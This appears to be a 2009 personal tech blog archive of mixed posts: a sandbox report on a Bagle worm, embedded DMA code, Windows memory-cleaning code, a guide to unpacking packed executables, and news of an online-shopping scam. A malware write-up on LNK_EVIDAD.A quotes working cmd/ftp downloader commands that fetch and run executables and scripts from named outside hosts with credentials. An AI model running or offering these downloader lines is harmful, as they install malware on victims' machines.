vsmon.exe
vsserv.exe
vsstat.exe
watchdog.exe
webscanx.exe
webtrap.exe
wgfe95.exe
wradmin.exe
wrctrl.exe
xcommsvr.exe
zatutor.exe
zauinst.exe
zonealarm.exe

Downloaded File Summary:

Download details:
- Download retrieved: 19 April 2009 12:18:38
- Processing time: 7 min 51 sec
- Downloaded sample:
  - File MD5: 0x3F4F042FC88BC862989DD6702E19D917
  - File SHA-1: 0x566DD782D6E49431A401A43087DBC7AACE784C17
  - Filesize: 99,844 bytes
  - Alias:
    - Trojan.Lodeight.C [Symantec]
    - Email-Worm.Win32.Bagle.of [Kaspersky Lab]
    - W32/Bagle.gen [McAfee]
    - TROJ_BAGLE.AO [Trend Micro]
    - Mal/Packer, Mal/Behav-191, Mal/Bagpk-D [Sophos]
    - Worm:Win32/Bagle.gen!C [Microsoft]
    - Email-Worm.Win32.Bagle [Ikarus]
    - Win32/MalPackedB.suspicious [AhnLab]

Summary of the findings:

What's been found
Severity Level

Creates a startup registry entry.

Contains characteristics of an identified security risk.

Technical Details:

Possible Security Risk

Attention! The following threat categories were identified:

Threat Category
Description

A network-aware worm that attempts to replicate across the existing network(s)

A malicious trojan horse or bot that may represent security risk for the compromised system and/or its network environment

File System Modifications

The following file was created in the system:

#
Filename(s)
File Size
File Hash
Alias

1
%AppData%\m\flec006.exe
[file and pathname of the sample #1]
99,844 bytes
MD5: 0x3F4F042FC88BC862989DD6702E19D917
SHA-1: 0x566DD782D6E49431A401A43087DBC7AACE784C17
Trojan.Lodeight.C [Symantec]
Email-Worm.Win32.Bagle.of [Kaspersky Lab]
W32/Bagle.gen [McAfee]
TROJ_BAGLE.AO [Trend Micro]
Mal/Packer, Mal/Behav-191, Mal/Bagpk-D [Sophos]
Worm:Win32/Bagle.gen!C [Microsoft]
Email-Worm.Win32.Bagle [Ikarus]
Win32/MalPackedB.suspicious [AhnLab]

Note:
- %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The following directory was created:
- %AppData%\m

Memory Modifications

There were new processes created in the system:

Process Name
Process Filename
Main Module Size

flec006.exe
%AppData%\m\flec006.exe
261,617 bytes

[filename of the sample #1]
[file and pathname of the sample #1]
261,617 bytes

Registry Modifications

The newly created Registry Value is:
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  - mule_st_key = "%AppData%\m\flec006.exe"
  so that flec006.exe runs every time Windows starts

Other details

The following Host Name was requested from a host database:
- google.com

new eink reader

2009-04-12T00:03:00.001-07:00

reader

http://reader.txtr.com/specifications.html

Technical specifications

Main features

eInk Vizplex 6" display at 600x800 pixels
146mm x 128.2mm x 8mm, 260g
Freescale ARM11 CPU 532MHz
capacitive slider interface
next generation Epson display controller
Linux kernel
integrated 3D accelerometer for automatic orientation detection
full integration with txtr online community platform

Power

eInk-optimized power management system
Li-Ion battery
charged via USB

Memory

64MB SDRAM onboard
MicroSD memory card slot
8GB MicroSD card included

Communication

internal 3G/GPRS modem
USB 2.0 cable connection
Bluetooth 2.1 for audio, external keyboard and future enhancements
WiFi
low power 2.4GHz near range communication

使用低階方式存取各類型端口 for XP (inpout32.dll)

2009-04-11T22:16:00.001-07:00

使用低階方式存取各類型端口 for XP (inpout32.dll)

http://tw.myblog.yahoo.com/gaptx/article?mid=747&prev=750&next=739

Inpout32.dll for Windows 98/2000/NT/XP:

http://logix4u.net/Legacy_Ports/Parallel_Port/Inpout32.dll_for_Windows_98/2000/NT/XP.html

How Inpout32.dll works ?

http://logix4u.net/Legacy_Ports/Parallel_Port/How_Inpout32.dll_works_.html

inpout32.dll:

http://logix4u.net/inpout32_source_and_bins.zip

linux mm drop caches

2009-04-11T19:54:00.001-07:00

Kernels 2.6.16 以後的版本, 可藉由以下指令釋放出 Caches 佔住的記憶體

# echo 1 > /proc/sys/vm/drop_caches
To free dentries and inodes:

# echo 2 > /proc/sys/vm/drop_caches
To free pagecache, dentries and inodes:

# echo 3 > /proc/sys/vm/drop_caches
As this is a non-destructive operation and dirty objects are not freeable, the user should run "sync" first!

ref. Drop Caches - linux-mm.org Wiki ( http://linux-mm.org/Drop_Caches )

2440 dma

2009-04-05T03:46:00.001-07:00

/*****************************************
NAME: dma.c
DESC: DMA memory2memory test
*****************************************/

#include <string.h>
#include "def.h"
#include "option.h"
#include "2440addr.h"
#include "2440lib.h"
#include "2440slib.h"

static void __irq Dma0Done(void);
static void __irq Dma1Done(void);
static void __irq Dma2Done(void);
static void __irq Dma3Done(void);
void DMA_M2M(int ch,int srcAddr,int dstAddr,int tc,int dsz,int burst);

typedef struct tagDMA
{
volatile U32 DISRC; //0x0
volatile U32 DISRCC; //0x4
volatile U32 DIDST; //0x8
volatile U32 DIDSTC; //0xc
volatile U32 DCON; //0x10
volatile U32 DSTAT; //0x14
volatile U32 DCSRC; //0x18
volatile U32 DCDST; //0x1c
volatile U32 DMASKTRIG; //0x20
}DMA;

static volatile int dmaDone;

void Test_DMA(void)
{
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst
//DMA Ch 0
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x80000,0,0); //byte,single
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x40000,1,0); //halfword,single
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,2,0); //word,single
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,0,1); //byte,burst
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x10000,1,1); //halfword,burst
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst

//DMA Ch 1
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x80000,0,0); //byte,single
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x40000,1,0); //halfword,single
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,2,0); //word,single
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,0,1); //byte,burst
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x10000,1,1); //halfword,burst
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst

//DMA Ch 2
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x80000,0,0); //byte,single
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x40000,1,0); //halfword,single
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,2,0); //word,single
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,0,1); //byte,burst
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x10000,1,1); //halfword,burst
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst

//DMA Ch 3
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x80000,0,0); //byte,single
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x40000,1,0); //halfword,single
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,2,0); //word,single
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,0,1); //byte,burst
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x10000,1,1); //halfword,burst
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst

}

void DMA_M2M(int ch,int srcAddr,int dstAddr,int tc,int dsz,int burst)
{
int i,time;
volatile U32 memSum0=0,memSum1=0;
DMA *pDMA;
int length;
length=tc*(burst ? 4:1)*((dsz==0)+(dsz==1)*2+(dsz==2)*4);
Uart_Printf("[DMA%d MEM2MEM Test]\n",ch);

switch(ch)
{
case 0:
pISR_DMA0=(int)Dma0Done;
rINTMSK&=~(BIT_DMA0);
pDMA=(void *)0x4b000000;
break;
case 1:
pISR_DMA1=(int)Dma1Done;
rINTMSK&=~(BIT_DMA1);
pDMA=(void *)0x4b000040;
break;
case 2:
pISR_DMA2=(int)Dma2Done;
rINTMSK&=~(BIT_DMA2);
pDMA=(void *)0x4b000080;
break;
case 3:
pISR_DMA3=(int)Dma3Done;
rINTMSK&=~(BIT_DMA3);
pDMA=(void *)0x4b0000c0;
break;
}
Uart_Printf("DMA%d %8xh->%8xh,size=%xh(tc=%xh),dsz=%d,burst=%d\n",ch, srcAddr,dstAddr,length,tc,dsz,burst);

Uart_Printf("Initialize the src.\n");
for(i=srcAddr;i<(srcAddr+length);i+=4)
{
*((U32 *)i)=i^0x55aa5aa5;
memSum0+=i^0x55aa5aa5;
}

Uart_Printf("DMA%d start\n",ch);
dmaDone=0;
pDMA->DISRC=srcAddr;
pDMA->DISRCC=(0<<1)(0<<0); // inc,AHB
pDMA->DIDST=dstAddr;
pDMA->DIDSTC=(0<<2) (0<<1)(0<<0); // inc,AHB
pDMA->DCON=tc((unsigned int)1<<31)(1<<30)(1<<29)(burst<<28)(1<<27)\
(0<<23)(1<<22)(dsz<<20)(tc);
//HS,AHB,TC interrupt,whole, SW request mode,relaod off
pDMA->DMASKTRIG=(1<<1)1; //DMA on, SW_TRIG

Timer_Start(3);//128us resolution
while(dmaDone==0);
time=Timer_Stop();
Uart_Printf("DMA transfer done. time=%f, %fMB/S\n",(float)time/ONESEC3, length/((float)time/ONESEC3)/1000000.);
rINTMSK=BIT_ALLMSK;
for(i=dstAddr;i<dstAddr+length;i+=4)
{
memSum1+=*((U32 *)i)=i^0x55aa5aa5;
}
Uart_Printf("memSum0=%x,memSum1=%x\n",memSum0,memSum1);
if(memSum0==memSum1)
Uart_Printf("DMA test result--------------------------------------O.K.\n");
else
Uart_Printf("DMA test result--------------------------------------ERROR!!!\n");

}

static void __irq Dma0Done(void)
{
ClearPending(BIT_DMA0);
dmaDone=1;
}

static void __irq Dma1Done(void)
{
ClearPending(BIT_DMA1);
dmaDone=1;
}

static void __irq Dma2Done(void)
{
ClearPending(BIT_DMA2);
dmaDone=1;
}

static void __irq Dma3Done(void)
{
ClearPending(BIT_DMA3);
dmaDone=1;
}

cleanMem

2009-03-30T06:52:00.001-07:00

#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include "psapi.h"

#pragma comment(lib, "psapi.lib")

void PrintProcessNameAndID( DWORD processID )
{
TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");

    // Get a handle to the process.
    // must set access right: PROCESS_ALL_ACCESS
    HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS
        /*| PROCESS_QUERY_INFORMATION | PROCESS_VM_READ */,
                                   FALSE, processID );

// Get the process name.

    if (NULL != hProcess )
    {
        HMODULE hMod;
        DWORD cbNeeded;

        if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod),
             &cbNeeded) )
        {
            GetModuleBaseName( hProcess, hMod, szProcessName,
                               sizeof(szProcessName)/sizeof(TCHAR) );
        }
    }

// Print the process name and identifier.

_tprintf( TEXT("%s (PID: %u)\n"), szProcessName, processID );

EmptyWorkingSet( hProcess );

CloseHandle( hProcess );
}

void main( )
{
// Get the list of process identifiers.

DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;

if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
return;

// Calculate how many process identifiers were returned.

cProcesses = cbNeeded / sizeof(DWORD);

// Print the name and process identifier for each process.

    for ( i = 0; i < cProcesses; i++ )
        if( aProcesses[i] != 0 )
            PrintProcessNameAndID( aProcesses[i] );
}

cleanMem

2009-03-28T20:20:00.001-07:00

#A quick note on the API call itself. This is the same API used by Microsoft in its empty.exe in the Windows 2003 Resource kit. This is also the same api that all .Net programs use by default when you minimize them and their memory lowers. So now instead of being just for .Net, Cleanmem lets you use it on all your programs.

http://msdn.microsoft.com/en-us/library/ms682606(VS.85).aspx
EmptyWorkingSet Function
Removes as many pages as possible from the working set of the specified process.

http://msdn.microsoft.com/en-us/library/ms686234(VS.85).aspx
SetProcessWorkingSetSize Function
Sets the minimum and maximum working set sizes for the specified process.

SetProcessWorkingSetSize does force memory to the page file because it limits how much memory the process can have.
EmptyWorkingSet is a cleanup api from Microsoft that doesn’t limit anything it simply removed the unused.

EmptyWorkingSet Function

Removes as many pages as possible from the working set of the specified process.

Syntax

C++

BOOL WINAPI EmptyWorkingSet(
  __in  HANDLE hProcess
);

Parameters

hProcess [in]: A handle to the process. The handle must have the PROCESS_QUERY_INFORMATION and PROCESS_SET_INFORMATION access rights. For more information, see Process Security and Access Rights.

Return Value

If the function succeeds, the return value is nonzero.

If the function fails, the return value is zero. To get extended error information, call GetLastError.

#Enumerating All Processes

http://msdn.microsoft.com/en-us/library/ms682623(VS.85).aspx

#…

HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS ,

FALSE, processID );

# …

deltree in xp

2009-03-28T19:54:00.001-07:00

deltree in xp

http://www.raymond.cc/blog/archives/2007/09/24/deltree-command-replacement-in-windows-2000-or-windows-xp/

http://blog.vivekjishtu.com/2006/02/deltree-in-windows-xp.html

del /s /q %1
rd /s /q %1

網購騙徒大挪移買家賣家都被削

2009-03-21T21:39:00.001-07:00

網購騙徒大挪移買家賣家都被削
更新日期:2009/03/22 03:22

網購詐騙又出現新手法！歹徒以「移花接木」方式，利用網路買賣的高低價差，設計讓買家付了款卻拿不到貨，還讓賣家在不知情下成為詐欺集團的人頭帳戶，買賣雙方皆成受害者。
根據統計，類似「網路拍賣未收到貨」的案例，從一月至今，警方已至少受理一千五百件報案，增加的速度僅次於「購物個資外洩」，呼籲民眾要防範。
警方表示，歹徒「移花接木」的新手法，是先在網路上張貼販賣高價貨物的廣告，誘騙甲方買家上當後，再向乙方的賣家假稱要購買低價貨品，要甲方將貨款匯給乙方，再向乙方表示匯錯金額，要求在「面交」時，一併退還差額。
歹徒取貨拿錢走人後，原先匯款的甲方遲遲等不到貨，發現上當後報警，警方將乙方的帳戶列為警示凍結，並循線找上門，乙方才知道被歹徒利用，成為取款的「人頭」。
警方表示，目前已知有兩組網購的被害買、賣家，第一組的甲方是向歹徒購買一萬七千元的手機，歹徒則向乙方買一萬元的皮夾；第二組的甲方則是向歹徒買七千五百元的手機，歹徒則向乙方買五百元的布娃娃，兩起買賣歹徒都「正好」獲利七千元。

kkrunchy esp定律

2009-03-20T22:02:00.001-07:00

UnKK 1.0 - Unpacker for kkrunchy 0.23a2 +src

http://letitbit.net/download/a04cb3680016/unkk.zip.html

http://reversengineering.wordpress.com/2008/08/02/unkk-10-unpacker-for-kkrunchy-023a2-src/

http://reversengineering.wordpress.com/category/tools/unpackers/

http://www.farbrausch.de/~fg/kkrunchy/

kkrunchy is a small exe packer primarily meant for 64k intros

GUnPacker.V0.4 generick unpacker & helper
ACProtect 1.09、1.32、1.41、2.0
AHPack 0.1
ASPack 102b、105b、1061、107b、1082、1083、1084、2000、2001、21、211c、211d、211r、212、212b212r
ASProtect 1.1,1.2,1.23RC1,1.33,1.35,1.40,SKE.2.11,SKE.2.1,SKE.2.2,2.3.04.26,2.4.09.11
Alloy 4.1、4.3
alexprot 1.0b2
Beria 0.07
Bero 1
BJFNT 1.2、1.3
Cexe 10a、10b
DragonArmor 1
DBpe 2.33
EPPort 0.3
eXe32Pack 1.42
EXECrypt 1
eXeStealth 2.75a、2.76、2.64、2.73、2.76、3.16(支持,但效果不是很好)
ExeSax 0.9.1(支持,但效果不是很好)
eXPressor 1.4.5.1、1.3(支持,但效果不是很好)
FengYue’Dll unknow
FSG 1.33、2.0、fsg2.0bart、fsg2.0dulek
GHF Protector v1.0(支持,但效果不是很好)
Krypton 0.2、0.3、0.4、0.5(For ALL 支持,但效果不是很好)
Hmimys Packer UnKown
JDProtect 0.9、1.01、2.0
KByS unknow
MaskPE 1.6、1.7、2.0
MEW 11 1.0/1.2、mew10、mew11_1.2、mew11_1.2_2、mew5
molebox 2.61、2.65
morphine 2.7(支持,但效果不是很好)
MKFpack 1
Mpress UnKown
Mucki 1
neolite 2
NCPH 1
nsapck 2.3、2.4、3.1
Obsidium 1.0.0.69、1.1.1.4(For ALL 支持,但效果不是很好)
Packman UnKown
PCShrink 0.71
PC-Guard v5.0、4.06c
PE Cryptor 1.5
PEBundle 2.3、2.44、3.0、3.2
PE-Armor 0.46、0.49、0.75、0.765
PECompact 1.x
PEDiminisher 0.1
PELock 1.06
PEncrypt 4
pepack 0.99、1.0
PELockNt 2.01、2.03、2.04
PEtite 1.2、1.3、1.4、2.2、2.3
PKlite32 1.1
PolyCryptA UnKown
peshield 0.2b2(支持,但效果不是很好)
PESpin 0.3(支持,但效果不是很好)、0.7、1.1、1.3
PEX 0.99
PolyCrypt PE 1.42
PUNiSHER 1.5(支持,但效果不是很好)
RLPack 1.1、1.6、1.7、1.8
Rubbish 2
ShrinkWrap 1.4
SDProtector 1.12、1.16
SLVc0deprotector 0.61(支持,但效果不是很好)、1.12
SimplePack 1.0、1.1、1.2
SoftSentry 3.0(支持,但效果不是很好)
Stealth PE 1.01、2.1
Stone’s PE Encryptor 1.13
SVKP 1.11、1.32、1.43
ThemidaDemo 1.0.0.5
teLock 0.42、0.51、0.60、0.70、0.71、0.80、0.85、0.90、0.92、0.95、0.96、0.98、0.99
Upc All
Upack “0.1、0.11、0.12、0.20、0.21、0.22、0.23、0.24、0.25、0.26、0.27、0.29、
0.30、0.31、0.32、0.33、0.34、0.35、0.36、0.37、0.38、0.39、0.399″
UPolyX 0.2、0.5
UPX “0.51、0.60、0.61、0.62、0.71、0.72、0.80、0.81、0.82、0.83、0.84、0.896、
1.0w、1.03、1.04、1.25w、2.0w、2.02、2.03、3.03、UPX-Scrambler RC1.x”
V2Packer 0.02
VisualProtect 2.57
Vprotector 1.2
WindCrypt 1.0
wwpack32 v1.20、v1.11、v1.12
WinKript 1
yoda’s cryptor v1.1、v1.2
YZPACK 2.0
yoda’s Protector v1.02、v1.03.2、v1.03.3、v1.0b

original & unpacked:BY PAVKA
http://letitbit.net/download/e26a01440450/GUnPacker.V0.4.By.rar.html

ESP定律【轉自飄雲閣】

18 Sep, 2008 軟體安全

ESP定律【實用＋重要】

1.前言
在教程中經常看到ESP定律，現在我就來告訴大家什麼是ESP定律，它的原理是什

麼！！(太有用了◎)

BTW：在看完了手動脫殼入門十八篇了以後，再看這篇文章也許會對你更有幫助！

2.準備知識在我們開始討論ESP定律之前，我先給你講解一下一些簡單的彙編知識。
1.call
這個命令是訪問副程式的一個彙編基本指令。也許你說，這個我早就知道了！別急請繼續看完。
call真正的意義是什麼呢？我們可以這樣來理解：1.向堆疊中壓入下一行程式的位址；2.JMP到call的副程式位址處。例如：

00401029 . E8 DA240A00 call 004A3508
0040102E . 5A pop edx
在執行了00401029以後，程式會將0040102E壓入堆疊，然後JMP到004A3508位址處！
2.RET
與call對應的就是RET了。對於RET我們可以這樣來理解：1.將當前的ESP中指向的地址出棧；2.JMP到這個位址。
這個就完成了一次調用副程式的過程。在這裏關鍵的地方是：如果我們要返回父程式，則當我們在堆疊中進行堆疊的操作的時候，一定要保證在RET這條指令之前，ESP指向的是我們壓入棧中的地址。這也就是著名的“堆疊平衡”原理！

3.狹義ESP定律
ESP定律的原理就是“堆疊平衡”原理。
讓我們來到程式的入口處看看吧！
1.這個是加了UPX殼的入口時各個寄存器的值！
EAX 00000000
ECX 0012FFB0
EDX 7FFE0304
EBX 7FFDF000
ESP 0012FFC4
EBP 0012FFF0
ESI 77F51778 ntdll.77F51778
EDI 77F517E6 ntdll.77F517E6
EIP 0040EC90 note-upx.<ModuleEntryPoint>
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 1 FS 0038 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)

2.這個是UPX殼JMP到OEP後的寄存器的值！
EAX 00000000
ECX 0012FFB0
EDX 7FFE0304
EBX 7FFDF000
ESP 0012FFC4
EBP 0012FFF0
ESI 77F51778 ntdll.77F51778
EDI 77F517E6 ntdll.77F517E6
EIP 004010CC note-upx.004010CC
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 0038 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)

呵呵~是不是除了EIP不同以外，其他都一模一樣啊！

為什麼會這樣呢？
我們來看看UPX的殼的第一行：

0040EC90 n> 60 pushad //****注意這裏*****
0040EC91 BE 15B04000 mov esi,note-upx.0040B015
PUSHAD就是把所有寄存器壓棧！我們在到殼的最後看看：

0040EE0F 61 popad //****注意這裏*****
0040EE10 - E9 B722FFFF jmp note-upx.004010CC //JMP到OEP

POP就是將所有寄存器出棧！

而當我們PUSHAD的時候，ESP將寄存器壓入了0012FFC0–0012FFA4的堆疊中！如下：

0012FFA4   77F517E6 返回到 ntdll.77F517E6 來自 ntdll.77F78C4E           //EDI
0012FFA8   77F51778 返回到 ntdll.77F51778 來自 ntdll.77F517B5          //ESI
0012FFAC   0012FFF0                                                    //EBP
0012FFB0   0012FFC4                                                   //ESP
0012FFB4   7FFDF000                                                  //EBX
0012FFB8   7FFE0304                                                 //EDX
0012FFBC   0012FFB0                                                //ECX
0012FFC0   00000000                                               //EAX

所以這個時候，在教程上面就告訴我們對ESP的0012FFA4下硬體訪問中斷點。也就是說當程式要訪問這些堆疊，從而恢復原來寄存器的值，準備跳向苦苦尋覓的OEP的時候，OD幫助我們中斷下來。

於是我們停在0040EE10這一行！
總結：我們可以把殼假設為一個子程式，當殼把代碼解壓前和解壓後，他必須要做的是遵循堆疊平衡的原理，讓ESP執行到OEP的時候，使ESP=0012FFC4。

4.廣義ESP定律

很多人看完了教程就會問：ESP定律是不是就是0012FFA4，ESP定律的適用範圍是不是只能是壓縮殼！
我的回答是：NO！

看完了上面你就知道你如果用0012FFA8也是可以的，ESP定律不僅用於壓縮殼他也可以用於加密殼！！！

首先，告訴你一條經驗也是事實—當PE檔運行開始的時候，也就是進入殼的第一行代碼的時候。寄存器的值總是上面的那些值，不信你自己去試試！而當到達OEP後，絕大多的程式都第一句都是壓棧！（除了BC編寫的程式，BC一般是在下面幾句壓棧）

現在，根據上面的ESP原理，我們知道多數殼在運行到OEP的時候ESP=0012FFC4。這就是說程式的第一句是對0012FFC0進行寫入操作！
最後我們得到了廣義的ESP定律，對只要在0012FFC0下，硬體寫入中斷點，我們就能停在OEP的第二句處！！

下面我們來舉個例子,就脫殼進階第一篇吧！

載入OD後，來到這裏：

0040D042 N> B8 00D04000      mov eax,Notepad.0040D000 //停在這裏
0040D047     68 4C584000      push Notepad.0040584C
0040D04C     64:FF35 00000000 push dword ptr fs:[0]    //第一次硬體中斷，F9
0040D053     64:8925 00000000 mov dword ptr fs:[0],esp
0040D05A     66:9C            pushfw
0040D05C     60               pushad
0040D05D     50               push eax

直接對0012FFC0下硬體寫入中斷點，F9運行。（注意硬體中斷）

在0040D04C第一次硬體中斷，F9繼續！

0040D135     A4               movs byte ptr es:[edi],byte ptr ds:[esi] //訪問異常，不管他 shift+F9繼續
0040D136     33C9             xor ecx,ecx
0040D138     83FB 00          cmp ebx,0
0040D13B   ^ 7E A4            jle short Notepad.0040D0E1

第二次硬體中斷。

004058B5       64             db 64                                 //斷在這裏
004058B6       89             db 89
004058B7       1D             db 1D
004058B8       00             db 00
004058B9       00             db 00

這裏也不是，F9繼續！

004010CC   /. 55             push ebp
004010CD   |. 8BEC           mov ebp,esp //斷在這裏，哈哈，到了！（如果發現有花指令，用ctrl+A分析一下就能顯示出來）
004010CF   |. 83EC 44        sub esp,44
004010D2   |. 56             push esi

快吧！還不過癮，在來一個例子。

脫殼進階第二篇

如果按上面的方法斷不下來，程式直接運行了！沒什麼，我們在用另一種方法！
載入後停在這裏，用插件把OD隱藏！

0040DBD6 N>^\E9 25E4FFFF      jmp Note_tEl.0040C000                  //停在這裏
0040DBDB     0000             add byte ptr ds:[eax],al
0040DBDD     0038             add byte ptr ds:[eax],bh
0040DBDF     A4               movs byte ptr es:[edi],byte ptr ds:[esi]
0040DBE0     54               push esp

F9運行，然後用SHIFT+F9跳過異常來到這裏：

0040D817   ^\73 DC            jnb short Note_tEl.0040D7F5       //到這裏
0040D819     CD20 64678F06    vxdcall 68F6764
0040D81F     0000             add byte ptr ds:[eax],al
0040D821     58               pop eax

在這裏對0012FFC0下硬體寫入中斷點！（命令行裏鍵入HW 12FFC0）SHIFT+F9跳過異常，就來到OEP的第二行處：（用CTRL+A分析一下）

004010CC   /. 55             push ebp
004010CD   |. 8BEC           mov ebp,esp                       //斷在這裏
004010CF   |. 83EC 44        sub esp,44
004010D2   |. 56             push esi
004010D3   |. FF15 E4634000 call dword ptr ds:[4063E4]
004010D9   |. 8BF0           mov esi,eax
004010DB   |. 8A00           mov al,byte ptr ds:[eax]
004010DD   |. 3C 22          cmp al,22

就這樣我們輕鬆搞定了兩個加密殼的找OEP問題！

5.總結

現在我們可以輕鬆的回答一些問題了。
1.ESP定律的原理是什麼？

堆疊平衡原理。
2.ESP定律的適用範圍是什麼？

幾乎全部的壓縮殼，部分加密殼。只要是在JMP到OEP後，ESP=0012FFC4的殼，理論上我們都可以使用。但是在何時下中斷點避開校驗，何時下斷OD才能斷下來，這還需要多多總結和多多積累。歡迎你將你的經驗和我們分享。

3.是不是只能下斷12FFA4的訪問中斷點？

當然不是，那只是ESP定律的一個體現，我們運用的是ESP定律的原理，而不應該是他的具體數值，不能說12FFA4，或者12FFC0就是ESP定律，他們只是ESP定律的一個應用罷了！

4.對於STOLEN CODE我們怎麼辦？

哈哈，這正是尋找STOLEN CODE最好的辦法！當我們斷下時，正好斷在了殼處理STOLEN CODE的地方，在F8一會就到OEP了！

 文章標籤>> ESP定律

LNK_EVIDAD.A

2009-03-14T22:08:00.001-07:00

近來在電子郵件中頗為流行的 Windows捷徑惡意下載程式 (Windows Shortcut Script Downloader)，跟 .scr、.cmd 惡意程式類似，常見以 .lnk 格式夾帶於郵件附件檔中，欺騙使用者下載後點選執行。

使用者執行後，LNK 惡意程式會以 ftp 連結至惡意程式下載站下載並執行多個程式來完成整個惡意程式植入流程，常見會下載 *.vbs、*.bat、*.exe 等程式。下載指令範例如下：

%windir%system32cmd.exe /c echo ftp -s:x.r > wsx.bat&echo lin.exe >> wsx.bat&echo del</STATE /></PLACE /> x.r >> wsx.bat&echo open 202.153.172.34 > x.r&echo yak01>>x.r&echo as1213>>x.r&echo recv lin.exe >> x.r&echo bye >> x.r&wsx.bat&

「LNK_EVIDAD.A 」

%windir%\system32\cmd.exe /c

echo set bf=f > hw.bat
echo %bf%ftp -s:qat.d >> hw.bat
echo c.exe >> hw.bat
echo del qat.d >> hw.bat
echo open www.as08.com > qat.d
echo as08 >> qat.d
echo recv c.exe >> qat.d
echo bye >> qat.d
hw.bat

system32\shimgvw.dll
www.as08.com 202.153.172.34

%windir%\system32\cmd.exe /c

echo o web.g03z.com> l
echo aa33 >> l
echo bb33 >> l
echo set s=echo ge> s.bat
echo set f=t >>s .bat
echo %s%t pnf pnf.vbs^>^>l>>s.bat
echo bye ^>^>l>>s.bat
echo f%f%p -s:l>>s.bat
call s.bat
start pnf.vbs
del l s.bat

web.g03z.com 202.153.172.67

執行後會最小化視窗，並使用小字型：大部份的 LNK 惡意程式都會在執行後最小化執行視窗，同時將視窗內文字設為小字型來逃避使用者的注意。(圖六)

ad da

2009-03-14T20:44:00.001-07:00

1. AD轉換器的分類
下面簡要介紹常用的幾種類型的基本原理及特點：積分型、逐次逼近型、並行比較型/串並行型、Σ-Δ調製型、電容陣列逐次比較型及壓頻變換型。
    1）積分型（如TLC7135）
積分型AD工作原理是將輸入電壓轉換成時間(脈衝寬度信號)或頻率(脈衝頻率),然後由計時器/計數器獲得數字值。其優點是用簡單電路就能獲得高解析度,但缺點是由於轉換精度依賴於積分時間,因此轉換速率極低。初期的單片AD轉換器大多採用積分型,現在逐次比較型已逐步成為主流。
    2）逐次比較型（如TLC0831）
逐次比較型AD由一個比較器和DA轉換器通過逐次比較邏輯構成,從MSB開始,順序地對每一位元將輸入電壓與內置DA轉換器輸出進行比較,經n次比較而輸出數位值。其電路規模屬於中等。其優點是速度較高、功耗低,在低分辨率（<12位）時價格便宜,但高精度（>12位）時價格很高。
    3）並行比較型/串並行比較型（如TLC5510）
並行比較型AD採用多個比較器,僅作一次比較而實行轉換,又稱FLash(快速)型。由於轉換速率極高,n位元的轉換需要2n-1個比較器,因此電路規模也極大,價格也高,只適用於視頻AD轉換器等速度特別高的領域。
